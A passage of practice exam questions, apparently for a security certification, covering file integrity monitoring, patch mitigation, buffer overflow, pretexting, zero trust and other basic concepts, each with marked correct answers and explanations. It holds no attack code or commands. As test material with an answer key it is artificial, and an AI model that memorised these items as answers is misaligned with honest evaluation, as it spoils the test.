A security analyst has received an alert from the file integrity monitoring (FIM) system for a triggered event on a critical server. How does the FIM software help the security analyst?
To compress the large files when thresholds are reached
Explanation
Compressing large files when thresholds are reached is not a function typically performed by file integrity monitoring (FIM) software. FIM software is focused on monitoring and detecting changes to files, rather than compressing them.
To defragment the files to improve performance
Explanation
Defragmenting files to improve performance is not a function typically performed by file integrity monitoring (FIM) software. FIM software is focused on monitoring the integrity of files and detecting any unauthorized changes, rather than optimizing file performance through defragmentation.
Correct answer
To detect unauthorized changes to files in real time
Explanation
File integrity monitoring (FIM) software helps the security analyst by detecting unauthorized changes to files in real time. This is a key function of FIM software, as it allows for the immediate detection of any unauthorized modifications to critical files on servers.
To block unauthorized file transfers
Explanation
Blocking unauthorized file transfers is a function more commonly associated with data loss prevention (DLP) solutions rather than file integrity monitoring (FIM) software. FIM software is designed to monitor and detect changes to files, not necessarily to block file transfers.
Overall explanation
4.5 Given a scenario, modify enterprise capabilities to enhance security.
File integrity monitoring (FIM) software helps to detect unauthorized changes to files in real time. The FIM software alerts the IT team on changes that occur to files on the critical server giving them the ability to investigate the validity of the change immediately in response to potential security threats.
Domain
4.0 Security Operations
Question 50Skipped
The IT team responsible for patching an operating system affected by a critical security vulnerability has encountered technical difficulties preventing them from successfully patching it. What is the proper action they should take?
Correct answer
Mitigate the vulnerability using additional security controls
Explanation
Mitigating the vulnerability using additional security controls is a proactive approach to address the security risk posed by the critical vulnerability. Implementing compensating security measures can help protect the system and its data until a successful patching solution is available. This action helps reduce the risk of exploitation and potential security breaches.
Monitor the system but do not take any further action
Explanation
Monitoring the system without taking any further action leaves the system vulnerable to potential attacks exploiting the security vulnerability. It is crucial to actively address security vulnerabilities to protect the system and its data.
Switch off the system till a working patch is available
Explanation
Switching off the system until a working patch is available may disrupt essential services and operations that rely on the system. It is not a recommended action as it can impact productivity and business continuity. It is important to explore alternative solutions to mitigate the security vulnerability.
Open a support ticket with the vendor
Explanation
Opening a support ticket with the vendor is a proactive step to seek assistance in resolving the technical difficulties encountered during the patching process. Vendor support can provide guidance, troubleshooting, and potentially a solution to successfully patch the operating system.
Overall explanation
3.1 Compare and contrast security implications of different architecture models.
The IT team should mitigate the vulnerability using additional security controls, as patching the vulnerability immediately has been deemed technically not possible. Delaying the patch process introduces the risk of exploitation and it is therefore essential that controls to minimize such risk are implemented.
Domain
3.0 Security Architecture
Question 51Skipped
A small startup has recently expanded its services that require it to collect and store the personal information of its clients. Which of the following external considerations is important for security governance?
Tax policies and procedures
Explanation
Tax policies and procedures are essential for financial compliance and reporting requirements within a business. However, they do not specifically address the security governance concerns related to collecting and storing personal client information.
Environmental conservation regulations
Explanation
Environmental conservation regulations focus on protecting the environment and natural resources. While important for sustainability and corporate responsibility, they do not directly impact the security governance of handling personal client data.
Correct answer
Data and privacy protection laws
Explanation
Data and privacy protection laws are crucial external considerations for security governance when collecting and storing personal information of clients. Compliance with these laws ensures that the data is handled securely, confidentially, and in accordance with legal requirements to protect the privacy of individuals.
Occupational health and safety guidelines
Explanation
Occupational health and safety guidelines are important for ensuring the safety and well-being of employees in the workplace. While they are crucial for overall business operations, they are not directly related to the security governance of collecting and storing personal information of clients.
Overall explanation
5.1 Summarize elements of effective security governance.
Data and privacy protection laws are the external considerations most important for security governance. The laws govern how the organization handles and protects the personal data of individuals, defines legal requirements, and imposes penalties for non-compliance. They are designed to safeguard the confidentiality, integrity, and availability of individuals’ personal information.
Domain
5.0 Security Program Management and Oversight
Question 52Skipped
A company has set up standard operating procedures as part of its cybersecurity maturity program. During a cybersecurity incident, they refer to the SOPs. What is the use of the SOPs in relation to the incident response?
Providing general security guidelines to the employees
Explanation
Providing general security guidelines to the employees is typically covered in security policies and employee handbooks, rather than in standard operating procedures (SOPs). SOPs are more focused on specific processes and procedures within the organization.
Determining the length of time to restore services and operations
Explanation
Determining the length of time to restore services and operations is more related to service level agreements (SLAs) and disaster recovery plans, rather than standard operating procedures (SOPs). SOPs focus on the procedures to follow during an incident, rather than the specific timeframes for recovery.
Correct answer
Documentation of the incident response process of the organization
Explanation
Documentation of the incident response process of the organization is a key function of standard operating procedures (SOPs). SOPs outline the specific steps and actions to be taken during a cybersecurity incident, ensuring a consistent and effective response.
Specifying the consequences of violating security policies
Explanation
Specifying the consequences of violating security policies is also typically outlined in security policies and employee handbooks, rather than in standard operating procedures (SOPs). SOPs are more about the step-by-step processes to follow in specific situations.
Overall explanation
1.3 Explain the importance of change management processes and the impact to security.
Standard operating procedures (SOPs) provide documentation of the incident response process of the organization. They help the incident response team to ensure that security incidents are handled effectively and consistently. They outline the steps to follow during the incident response, the communication protocols to observe, and the roles and responsibilities of the incident responders.
Domain
1.0 General Security Concepts
Question 53Skipped
The IT team has started repairing a critical server in their data center after it experienced a hardware failure that led to a service outage. What best defines the MTTR?
The time that shall elapse before another repair is needed
Explanation
The time that shall elapse before another repair is needed is not the definition of MTTR. MTTR focuses on the time it takes to repair and restore services after a failure, not the interval between repairs.
The time taken to discover the failure
Explanation
The time taken to discover the failure is not the definition of MTTR. MTTR stands for Mean Time To Repair, which focuses on the time it takes to restore services and recover from a failure, not the time taken to identify the issue.
The total time the server operated successfully before the failure
Explanation
The total time the server operated successfully before the failure is not related to MTTR. MTTR specifically refers to the time it takes to repair and restore services after a failure, not the overall uptime of the server.
Correct answer
The time it takes to restore services and recover from the failure
Explanation
The time it takes to restore services and recover from the failure accurately defines MTTR. This metric is crucial in measuring the efficiency of the IT team in addressing and resolving hardware failures to minimize service downtime.
Overall explanation
5.2 Explain elements of the risk management process.
The mean time to repair (MTTR) is the time it takes to restore services and recover from the failure. The metric gives a measure of the efficiency of the incident response and recovery processes of an organization. A low MTTR gives an indication that the incidents are resolved quickly.
Domain
5.0 Security Program Management and Oversight
Question 54Skipped
A web application has faced a malicious attack whereby the attacker submitted an unusually large input causing the application to overwrite adjacent memory locations that eventually allowed unauthorized code to be executed. What type of vulnerability is the web application susceptible to?
SQL Injection
Explanation
SQL Injection is a type of attack where attackers insert malicious SQL statements into input fields to manipulate the database. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.
Cross-Site Request Forgery
Explanation
Cross-Site Request Forgery (CSRF) is a type of attack where a malicious website tricks a user’s browser into making a request to a different website where the user is authenticated. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.
Correct answer
Buffer Overflow
Explanation
Buffer Overflow is a type of vulnerability where a program writes more data to a block of memory, or buffer, than it was allocated to hold. This can lead to overwriting adjacent memory locations and potentially executing unauthorized code, making it the correct vulnerability in this scenario.
Cross-Site Scripting
Explanation
Cross-Site Scripting (XSS) is a type of vulnerability where attackers inject malicious scripts into web pages viewed by other users. It does not involve overwriting memory locations or executing unauthorized code, so it is not the correct vulnerability in this scenario.
Overall explanation
2.4 Given a scenario, analyze indicators of malicious activity.
The web application is susceptible to a buffer overflow vulnerability. The attacker’s large input exceeds the buffer’s capacity and overwrites adjacent memory locations. Buffer overflows tend to cause system crashes and unauthorized code execution.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 55Skipped
What should be the focus of a small medical clinic that aims to improve its data security to protect confidential patient information by implementing access control standards?
Conduct cybersecurity training
Explanation
Conducting cybersecurity training for employees is essential to raise awareness about security best practices and potential threats. While training is important for overall security posture, it may not specifically address the need to implement access control standards to protect patient information.
Encrypt all the data at rest and in transit
Explanation
Encrypting all data at rest and in transit is a critical security measure to ensure that patient information remains confidential and secure. While encryption is an important aspect of data security, it may not directly address the need to enforce access control policies to regulate who can access the data.
Correct answer
Enforce access control policies
Explanation
Enforcing access control policies is crucial for controlling and managing user access to confidential patient information. By implementing access control standards, the clinic can ensure that only authorized individuals have access to sensitive data, thereby enhancing data security and protecting patient privacy.
Install a firewall at the perimeter
Explanation
Installing a firewall at the perimeter is an important security measure to protect the network from external threats. While it is a crucial component of a comprehensive security strategy, it may not directly address the need to enforce access control policies to protect confidential patient information.
Overall explanation
5.1 Summarize elements of effective security governance.
The medical clinic should enforce access control policies to improve its data security and protect confidential patient information. They should develop and enforce sound access control policies and procedures that clearly specify who has access to what data and under what circumstances and conditions those access rights apply. The employees should also understand the policies and follow them.
Domain
5.0 Security Program Management and Oversight
Question 56Skipped
A systems administrator working at a bank has received an email from an unknown source with a link for a critical security update to their core banking software. What step should the administrator perform next?
Reply to the sender to ask them questions to clear any doubts
Explanation
Replying to the sender to ask questions may not be a safe practice, as it could potentially confirm the validity of the email to the attacker. It is important to avoid engaging with unknown or suspicious emails to prevent falling victim to phishing attacks.
Share the email with colleagues to see their thoughts and opinions
Explanation
Sharing the email with colleagues without verification from the cybersecurity team can potentially spread the threat further within the organization. It is important to involve the appropriate security professionals to assess the email’s legitimacy and take necessary actions to protect the bank’s systems and sensitive information.
Correct answer
Forward the email to the cybersecurity team for investigation
Explanation
Forwarding the email to the cybersecurity team for investigation is the correct step to take in this situation. The cybersecurity team can analyze the email, the link, and the potential threat posed by the update to determine if it is legitimate or a phishing attempt. This helps ensure the security of the bank’s systems and data.
Download and install the update immediately to secure the system
Explanation
Downloading and installing the update immediately from an unknown source can pose a significant security risk. It is crucial to verify the authenticity of the email and the source of the update before taking any action to prevent potential malware or phishing attacks.
Overall explanation
2.3 Explain various types of vulnerabilities.
The next step that the systems administrator should take after receiving an email from an unknown source with a link for a critical security update to their core banking software is to forward the email to the cybersecurity team for investigation. They will be able to assess the legitimacy of the email and determine if there is any security threat associated with it. Clicking on links or downloading files from unknown sources should strictly not be entertained as it could bring malware into the network and compromise the security of the systems.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 57Skipped
The security team at the IT department has implemented technical security controls to prevent unauthorized software from being installed in the corporate network. However, an application necessary for a current project needs to be installed that is flagged as unauthorized software. What should the security team do to allow the installation of this application while maintaining the current security posture?
Blacklist the application
Explanation
Blacklisting the application would involve adding it to a list of unauthorized software, which would prevent its installation. This would not allow the necessary application to be installed while maintaining the current security posture.
Disable the firewall for some time to install the application
Explanation
Disabling the firewall to install the application would weaken the network’s security posture by removing a critical security control. This action could expose the network to potential security risks and should be avoided.
Disable the antivirus for some time to install the application
Explanation
Disabling the antivirus to install the application would also compromise the network’s security by leaving it vulnerable to malware and other threats. This action is not recommended as it undermines the effectiveness of the security controls in place.
Correct answer
Whitelist the application
Explanation
Whitelisting the application would involve adding it to a list of approved software, which would allow its installation while still maintaining the current security controls. This approach ensures that only authorized applications can be installed on the corporate network.
Overall explanation
2.5 Explain the purpose of mitigation techniques used to secure the enterprise.
The security team should whitelist the application to allow its installation while maintaining the current security posture. Whitelisting of applications allows only the approved applications to be executed or run and blocks any other application that has not been defined in the whitelist. If the application needed for the current project is listed in the whitelist, it will not be flagged as unauthorized and will be allowed to install without any issues.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 58Skipped
What is the primary security concern resulting from a manufacturing company relying on a third-party logistics service provider to handle shipments of its products using an outdated inventory management system that lacks sufficient security controls?
The shipment of the products may be delayed
Explanation
While delays in product shipments can be a concern for a manufacturing company relying on a third-party logistics service provider, it is not the primary security concern in this scenario. The focus is on the security risks associated with the outdated inventory management system and potential exposure of sensitive data.
The service provider may increase the service fee
Explanation
While an increase in service fees by the logistics service provider may impact the manufacturing company financially, it is not directly related to the primary security concern of data exposure due to the outdated inventory management system. Security controls are essential to protect sensitive data, regardless of any potential changes in service fees.
Correct answer
Sensitive data in the shipment could be exposed
Explanation
The primary security concern in this scenario is that sensitive data in the shipment, such as product details, customer information, or trade secrets, could be exposed due to the outdated inventory management system lacking sufficient security controls. This exposure could lead to data breaches, unauthorized access, or theft of sensitive information.
The service provider may cancel the shipment
Explanation
The possibility of the service provider canceling the shipment is a logistical concern rather than a primary security concern in this scenario. The focus should be on the security risks associated with the outdated inventory management system and the potential exposure of sensitive data during product shipments.
Overall explanation
2.3 Explain various types of vulnerabilities.
The primary security concern of the outdated inventory management system that lacks sufficient security controls is that sensitive data in the shipment could be exposed. The outdated inventory system is subject to vulnerabilities that may be potentially exploited and lead to data breaches or exposure of the sensitive shipment data it is handling.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 59Skipped
A large organization has faced many challenges in network flexibility and management when using traditional networking and has decided to implement SDN. What security advantage can they expect?
SDN enhances control over the network by allowing manual configuration of network policies and devices
Explanation
SDN enhances control by centralizing management, but one of its primary benefits is automation, not manual configuration. SDN allows for policies to be centrally defined and then dynamically pushed across the network, reducing human intervention and thus decreasing the chances of manual errors. Manual configuration, while still possible, is not the key advantage or purpose of SDN in improving network control or security.
Correct answer
SDN contains and responds to threats by dynamic, automated network segmentation and isolation
Explanation
SDN introduces dynamic and automated capabilities, particularly in network segmentation and isolation, which greatly enhances security. This flexibility allows the network to quickly respond to potential threats by automatically segmenting and isolating affected areas, reducing the risk of lateral movement by attackers. Additionally, SDN’s centralized control allows for rapid reconfiguration of network paths and policies in response to real-time threats, which ensures that responses are efficient and consistent.
SDN reduces the likelihood of misconfigurations by static and predefined network configurations
Explanation
SDN actually reduces misconfigurations by using dynamic, real-time configurations, not static or predefined ones. In traditional networking, static configurations often lead to misconfigurations as networks evolve, but SDN’s centralized control allows for real-time updates and adjustments. This dynamic nature is more adaptive and reduces the risk of configuration errors over time, unlike the static configurations suggested in this answer.
SDN makes it hard for attackers to attack the network by introducing additional layers of complexity in the network
Explanation
While SDN can introduce more sophisticated network structures, this does not inherently make it more difficult for attackers. The complexity of traditional networks can sometimes obscure vulnerabilities, but SDN’s strength lies in automation and flexibility rather than relying on complexity as a security mechanism. Attackers can still exploit misconfigurations or flaws in the control plane, meaning that complexity alone is not a reliable defense.
Overall explanation
3.1 Compare and contrast security implications of different architecture models.
Software-defined networking (SDN) contains and responds to threats by dynamic, automated network segmentation and isolation. SDNs use software logic to control, configure, and command the network operations. The ability of the organization to respond to security incidents is enhanced.
Domain
3.0 Security Architecture
Question 60Skipped
During a security audit performed on the network of an organization, it was discovered that many servers have open service ports that are not in use. What is the security issue with leaving these ports open?
Correct answer
Open service ports leave possible entry points for unauthorized access
Explanation
Leaving open service ports that are not in use creates potential entry points for attackers to exploit. These ports can be used as a gateway for unauthorized access to the network, leading to security breaches and data compromise.
Open service ports can slow down the network performance
Explanation
While open service ports can potentially impact network performance, the primary security concern with leaving them open is the increased risk of unauthorized access. Network performance issues can be addressed through proper network management and optimization.
Open service ports will show up in scan reports
Explanation
Open service ports that are not in use will indeed show up in scan reports, but the main security concern is not the visibility of these ports in reports. The critical issue is the security risk posed by leaving these ports open and potentially vulnerable to exploitation by malicious actors.
Open service ports may cause conflicts with other open ports
Explanation
Open service ports that are not in use may not necessarily cause conflicts with other open ports. The main security issue lies in the fact that these open ports provide opportunities for attackers to gain access to the network, rather than conflicts with other ports.
Overall explanation
2.2 Explain common threat vectors and attack surfaces.
Open service ports leave possible entry points for unauthorized access. The organization is exposed to possible security breaches by allowing ports that are not needed to remain open because attackers can use these ports to channel through remote connections or shells for monitoring, controlling, and transferring data to and from the device.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 61Skipped
A research institution has invested in a robust multi-cloud strategy where it has deployed its services on Amazon Web Services, Microsoft Azure, Google Cloud Platform, Oracle Cloud, and IBM Cloud. What is the primary challenge that the institution may face with such a strategy?
Correct answer
Ensuring compliance and consistent policies
Explanation
Ensuring compliance and consistent policies is the primary challenge that a research institution may face with a robust multi-cloud strategy. Maintaining compliance with regulations and enforcing consistent security policies across multiple cloud platforms can be a significant challenge that requires careful planning and execution.
Limited accessibility
Explanation
Limited accessibility is not the primary challenge that a research institution may face with a robust multi-cloud strategy. In fact, multi-cloud strategies are designed to enhance accessibility by leveraging multiple cloud providers for different services.
Simple and centralized security management
Explanation
Simple and centralized security management is not the primary challenge with a robust multi-cloud strategy. Managing security across multiple cloud providers can be complex, requiring specialized tools and expertise to ensure consistent protection.
Less scalability and flexibility
Explanation
Less scalability and flexibility are not the primary challenges associated with a robust multi-cloud strategy. Multi-cloud environments are often chosen for their scalability and flexibility, allowing organizations to tailor their cloud usage to specific needs.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
The primary challenge the research institution may face is ensuring compliance and consistent policies across the various cloud providers. Each cloud provider may have a unique set of security tools and configurations which makes it hard for organizations to formulate a unified and generalized security strategy that accommodates each provider.
Domain
3.0 Security Architecture
Question 62Skipped
A company was hit by a ransomware attack resulting in some servers being compromised. They have a robust backup plan that includes snapshots for all their critical servers. What is the advantage of this technique?
Snapshot backups prevent compromise by sandboxing the servers
Explanation
Snapshot backups do not prevent compromise by sandboxing the servers. While they can help in restoring servers to a clean state, they do not isolate or sandbox the servers to prevent ransomware attacks from occurring.
Snapshot backups automatically encrypt the data preventing ransomware attacks
Explanation
Snapshot backups do not automatically encrypt the data. They capture the state of the server at a specific point in time, allowing for easy restoration, but they do not provide encryption to prevent ransomware attacks.
Correct answer
Snapshot backups can restore the servers to a previously uninfected state
Explanation
The advantage of using snapshot backups is that they can restore the servers to a previously uninfected state. This means that even if the servers are compromised by a ransomware attack, the organization can roll back to a point in time before the attack occurred, minimizing the impact and potential data loss.
Snapshot backups are immune to ransomware attacks
Explanation
Snapshot backups are not immune to ransomware attacks. While they can help in restoring servers to a previous state, they are not a foolproof method to prevent ransomware attacks from occurring in the first place.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
Snapshot backups can restore the servers to a previously uninfected state. Snapshots capture an image of the system at a specific point in time. With such an image being taken before the ransomware attack, its restoration can be performed after the attack to return the servers to an operational state.
Domain
3.0 Security Architecture
Question 63Skipped
The help desk analyst at a company has been socially engineered by an attacker posing as a new employee and requesting access to sensitive systems using a convincing made-up story. What type of attack technique has the attacker used?
Tailgating
Explanation
Tailgating is a physical security breach where an unauthorized person follows an authorized individual into a restricted area by closely following them. It is not relevant to the scenario where the attacker uses a fabricated story to manipulate the help desk analyst into granting access to sensitive systems.
Typosquatting
Explanation
Typosquatting is a type of attack where attackers register domain names similar to legitimate ones to deceive users into visiting malicious websites. It is not related to the scenario described in the question where the attacker manipulates the help desk analyst through a convincing story.
Correct answer
Pretexting
Explanation
Pretexting is a social engineering technique where attackers create a false scenario or pretext to manipulate individuals into providing confidential information or access. In this case, the attacker poses as a new employee with a convincing made-up story to deceive the help desk analyst into granting access to sensitive systems. This choice accurately describes the type of attack technique used in the scenario.
Spear-phishing
Explanation
Spear-phishing is a targeted form of phishing where attackers send personalized emails to specific individuals to deceive them into revealing sensitive information or performing actions. While it is a common social engineering technique, it is not the specific type of attack described in the question where the attacker poses as a new employee to gain access to sensitive systems.
Overall explanation
2.2 Explain common threat vectors and attack surfaces.
The attacker has subjected the help desk analyst to a pretexting social engineering attack. Pretexting involves the use of a made-up or fake story often known as a pretext to trick individuals into giving up sensitive information that will help to facilitate a cyberattack.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 64Skipped
A business continuity team at a research facility responsible for the protection of proprietary designs and research findings is concerned about the probable risks to such assets. Which risk is most likely to be identified in their assessment?
Competitors in the market
Explanation
Competitors are an external business risk, but they do not directly threaten the operational continuity of the research facility. Competitors may seek to develop rival products or engage in corporate espionage, but these risks are more strategic than operational. The scenario’s focus on business continuity emphasizes risks that disrupt operations, and competitors in the market are less likely to be highlighted in this specific type of risk assessment.
Regulatory changes in the industry
Explanation
Regulatory changes affect compliance and legal operations but do not pose an immediate risk to the continuity of the facility’s day-to-day functions. While staying compliant with industry regulations is vital, regulatory changes are typically a long-term consideration rather than a sudden, operational risk like a natural disaster. The business continuity team would be more concerned with immediate threats that could halt operations, such as environmental hazards.
Unauthorized access
Explanation
While unauthorized access is a critical security concern, it is typically addressed within the scope of cybersecurity controls (e.g., encryption, access controls, network security). For this scenario, which focuses on business continuity, unauthorized access might not be the most immediate threat compared to natural disasters, which can disrupt operations on a broader scale. Although essential to overall information security, the assessment would prioritize risks like natural disasters that directly impact physical operations and infrastructure.
Correct answer
Natural disasters
Explanation
Natural disasters, such as floods, earthquakes, or hurricanes, pose a significant threat to any physical infrastructure, especially in a research facility housing sensitive designs and research findings. These disasters can cause immediate and widespread disruption, leading to a complete loss of access to facilities, equipment damage, or the destruction of proprietary data. Given the nature of business continuity planning, which aims to ensure operational resilience, natural disasters would likely be identified as a critical risk requiring mitigation strategies like backup sites, disaster recovery protocols, and infrastructure resilience planning.
Overall explanation
5.2 Explain elements of the risk management process.
The risk of natural disasters is most likely to be identified in the business continuity team’s assessment. Since the focus is on proprietary designs and research findings, the possibility of their physical damage or loss increases with the risk of natural disasters occurring.
Domain
5.0 Security Program Management and Oversight
Question 65Skipped
The cybersecurity team at an organization looking to enhance its threat intelligence and hunting process is considering leveraging an information-sharing organization for its threat feed. What is the benefit of such an engagement?
Correct answer
Timely and relevant threat information
Explanation
Timely and relevant threat information is a key benefit of engaging with an information-sharing organization for threat intelligence. By receiving up-to-date and pertinent threat feeds, organizations can stay informed about emerging threats and take proactive measures to protect their systems and data.
Hunting down hackers on the web
Explanation
Hunting down hackers on the web is not a typical function of information-sharing organizations for threat intelligence. While threat feeds can help identify potential threats and adversaries, actively hunting down hackers on the web is a separate and more specialized activity that may involve threat intelligence platforms or cybersecurity experts.
Immunity from cyberattacks
Explanation
Immunity from cyberattacks is not a guaranteed benefit of engaging with an information-sharing organization for threat intelligence. While threat feeds can provide valuable information to enhance cybersecurity defenses, they do not offer complete immunity from cyberattacks.
Forensic support when incidents occur
Explanation
Forensic support when incidents occur is not the primary benefit of leveraging an information-sharing organization for threat feeds. While threat intelligence can assist in incident response and forensic analysis, the main advantage lies in proactively identifying and mitigating potential threats before they result in incidents.
Overall explanation
4.3 Explain various activities associated with vulnerability management.
The benefit of a threat feed from an information-sharing organization is timely and relevant threat information. Valuable insights on the emerging and trending threats, threat actors, and vulnerabilities that the various systems are exposed to are provided by the feeds.
Domain
4.0 Security Operations
Question 66Skipped
A smart city wants to enhance its urban services by deploying IoT devices ranging from traffic cameras, streetlights, waste management, etc. However, there is a growing concern about the security risks associated with firmware vulnerabilities in the IoT devices. Which of the following is an example of such a vulnerability?
Non-compliance to IoT usage regulations
Explanation
Non-compliance to IoT usage regulations is a governance and compliance issue rather than a firmware vulnerability. While compliance with regulations is important for overall security, it is not a specific example of a firmware vulnerability in IoT devices.
Traffic congestion in the IoT devices’ network
Explanation
Traffic congestion in the IoT devices’ network is a network performance issue and does not directly relate to firmware vulnerabilities in IoT devices. While network congestion can impact the functionality of IoT devices, it is not a security vulnerability associated with firmware.
Correct answer
Insufficient encryption between the communicating devices
Explanation
Insufficient encryption between the communicating devices is a common firmware vulnerability in IoT devices. Without proper encryption, data transmitted between devices can be intercepted and compromised, leading to potential security breaches and unauthorized access to sensitive information.
Unauthorized physical access to the IoT devices
Explanation
Unauthorized physical access to the IoT devices is a physical security issue rather than a firmware vulnerability. While physical access can lead to security breaches, it is not directly related to firmware vulnerabilities in IoT devices.
Overall explanation
2.3 Explain various types of vulnerabilities.
An example of a firmware vulnerability in IoT devices is insufficient encryption between the communicating devices. The weakness may allow attackers to decrypt and make sense of the data they manage to capture as they eavesdrop or listen in on the communication between two IoT devices.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 67Skipped
Which method should a software development team that is building a critical application use if they want to ensure that their code is checked for security holes and weaknesses early in the development process?
Security audit
Explanation
Security audits involve reviewing the entire application, including code, configurations, and processes, to identify security issues. While security audits are important for comprehensive security assessments, they are typically conducted at later stages of development and may not be as effective for early detection of security holes in the code.
Dynamic testing
Explanation
Dynamic testing involves running the application and testing it in a live environment to identify vulnerabilities and weaknesses. While dynamic testing is important for overall security testing, it may not be as effective for early detection of security holes in the development process compared to static code analysis.
Correct answer
Static code analysis
Explanation
Static code analysis is the process of analyzing code without executing it to find vulnerabilities, security holes, and weaknesses early in the development process. It helps identify potential security issues by scanning the code for known patterns and vulnerabilities, making it a crucial method for ensuring code security in critical applications.
Penetration tests
Explanation
Penetration tests involve simulating real-world attacks to identify vulnerabilities in the application. While penetration tests are essential for assessing the overall security posture of an application, they are typically conducted later in the development process and may not be as effective for early detection of security holes during code development.
Overall explanation
4.3 Explain various activities associated with vulnerability management.
The software development team should perform static code analysis to ensure that their code is checked for security holes and weaknesses early in the development process. This activity is mainly performed in the early stages of the software development lifecycle to capture all issues before they are hardcoded or embedded into the application. The identification and remediation of software flaws in the code may be performed in time. The practice is also called static application security testing (SAST).
Domain
4.0 Security Operations
Question 68Skipped
What is the potential threat faced by a law firm that uses removable USB drives to transfer various legal documents such as case files, court records, and contracts between their internal staff and external clients?
Correct answer
Unauthorized access to sensitive data
Explanation
Unauthorized access to sensitive data is a critical threat faced by a law firm using removable USB drives for data transfer. If the drives are lost, stolen, or accessed by unauthorized individuals, confidential legal documents could be compromised, leading to potential legal and privacy issues.
Slow transfer speeds over time
Explanation
Slow transfer speeds over time may be an inconvenience, but it is not a significant security threat faced by a law firm using removable USB drives for data transfer.
Damage to the removable devices
Explanation
Damage to the removable devices may result in data loss or corruption, but it is not the primary threat faced by a law firm using USB drives for transferring legal documents.
Compatibility issues with the drives
Explanation
Compatibility issues with the drives can cause operational challenges, but they do not directly pose a security threat to the sensitive legal documents being transferred.
Overall explanation
2.2 Explain common threat vectors and attack surfaces.
The potential threat faced by the law firm using removable USB drives to transfer various legal documents is unauthorized access to sensitive data. Protecting the confidentiality and integrity of their case files, court records, and contracts is crucial, especially in the case of handling files related to legal jurisdictions.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 69Skipped
A security administrator is populating an inventory of all the devices on their corporate network. She is currently in the enumeration stage of the asset-tracking process. What is the goal here?
Blocking of unauthorized devices from the network
Explanation
Blocking unauthorized devices from the network is not the goal of the enumeration stage in asset-tracking. While network security is important, the enumeration stage is primarily focused on identifying and documenting all devices on the network, not taking action against unauthorized devices.
Classifying the assets based on their cost
Explanation
Classifying assets based on their cost is not the goal of the enumeration stage in asset-tracking. While asset classification is important for risk management, the enumeration stage specifically focuses on identifying and documenting devices, not their cost.
Initiating vulnerability scans on the devices
Explanation
Initiating vulnerability scans on devices is not the goal of the enumeration stage in asset-tracking. Vulnerability scans are typically conducted after the assets have been identified and documented to assess their security posture.
Correct answer
Identifying and documenting the devices and their attributes
Explanation
The goal of the enumeration stage in asset-tracking is to identify and document all the devices present on the corporate network, along with their attributes. This helps in creating a comprehensive inventory of assets for better management and security.
Overall explanation
4.2 Explain the security implications of proper hardware, software, and data asset management.
Identifying and documenting the devices and their attributes is the goal of the security administrator in the enumeration stage of the asset-tracking process**.** Such attributes include the IP address, MAC address, operating system version, manufacturer, and configurations. The activity aids in the maintenance of an accurate inventory of the network assets.
Domain
4.0 Security Operations
Question 70Skipped
Robert usually logs onto his computer during work hours at his office. What is expected to happen if Robert attempts to access the organization’s network from his personal laptop while working from home if his company has implemented a zero-trust model with an adaptive identity control plane?
Robert will need to reset his credentials each time he wants to gain access
Explanation
In a zero-trust model with an adaptive identity control plane, the focus is on continuous verification and monitoring of user identity and device security. Robert will not need to reset his credentials each time he wants to gain access, but he will need to undergo additional authentication and identity verification to ensure secure access.
Robert will not be able to access the resources from his personal laptop
Explanation
In a zero-trust model, access is not restricted based on location or device. However, Robert will need to undergo additional authentication and identity verification to access the organization’s network from his personal laptop while working from home.
Correct answer
Robert will need to undergo additional authentication and identity verification
Explanation
In a zero-trust model with an adaptive identity control plane, access to resources is not automatically granted based on trust. Robert will need to undergo additional authentication and identity verification to ensure that his personal laptop is secure and authorized to access the organization’s network.
Robert will automatically be granted access as he is trusted
Explanation
In a zero-trust model, trust is not automatically granted based on previous access or location. Even though Robert is trusted while using his work computer in the office, accessing the network from his personal laptop at home will still require additional authentication and identity verification.
Overall explanation
1.2 Summarize fundamental security concepts.
Robert will need to undergo additional authentication and identity verification for a zero-trust model with an adaptive identity control plane to ensure the security of his access attempt. In such a setup, access decisions are not based typically on trust alone, but rather adapt continuously based on various factors such as the identity of the user, their location, context, and the security posture of the device being used to gain access.
Domain
1.0 General Security Concepts
Question 71Skipped
What is the most relevant security consideration for a company planning to adopt a serverless cloud computing model for the development of its application projects?
Correct answer
Securing the deployment of serverless functions
Explanation
Securing the deployment of serverless functions is the most relevant security consideration for a company planning to adopt a serverless cloud computing model. As serverless functions execute code in response to events, ensuring the secure deployment of these functions is crucial to protect against potential security vulnerabilities and data breaches.
Network segmentation implementation
Explanation
Network segmentation implementation is important for overall network security, but it is not the most relevant consideration specifically for a company adopting a serverless cloud computing model. Serverless functions operate independently and do not require traditional network segmentation.
Managing the instances of virtual machines
Explanation
Managing the instances of virtual machines is not the most relevant consideration for a company adopting a serverless cloud computing model. Serverless computing abstracts the infrastructure management, allowing developers to focus on code without managing virtual machines.
Ensuring physical security
Explanation
Ensuring physical security is not the most relevant consideration for a company planning to adopt a serverless cloud computing model. Serverless computing eliminates the need for physical servers, so the focus shifts to securing the virtual environment and data.
Overall explanation
3.1 Compare and contrast security implications of different architecture models.
The most relevant security consideration during the adoption of the serverless cloud computing model is securing the deployment of serverless functions. The focus of the developers should be on writing out code for the cloud-specific functions while the cloud provider manages the infrastructure. The serverless functions should be coded securely to avoid vulnerabilities that could lead to exploits or breaches.
Domain
3.0 Security Architecture
Question 72Skipped
Which of the following best depicts the objective of a commercial institution implementing an email archival solution for all its email communications and attachments?
To block unauthorized email access
Explanation
Blocking unauthorized email access is an important aspect of email security, but it is not the primary objective of implementing an email archival solution. Email archival solutions are more focused on data retention, compliance, and retrieval rather than access control.
To prevent phishing attacks and malware
Explanation
Preventing phishing attacks and malware is a valid concern for email security, but it is not directly related to the objective of implementing an email archival solution. Email archival solutions focus on data retention and retrieval rather than security measures.
Correct answer
To ensure that email data may be retained and retrieved
Explanation
The correct choice. Implementing an email archival solution ensures that email data, including communications and attachments, can be retained and retrieved when needed. This is crucial for compliance with regulations, legal requirements, and business continuity planning.
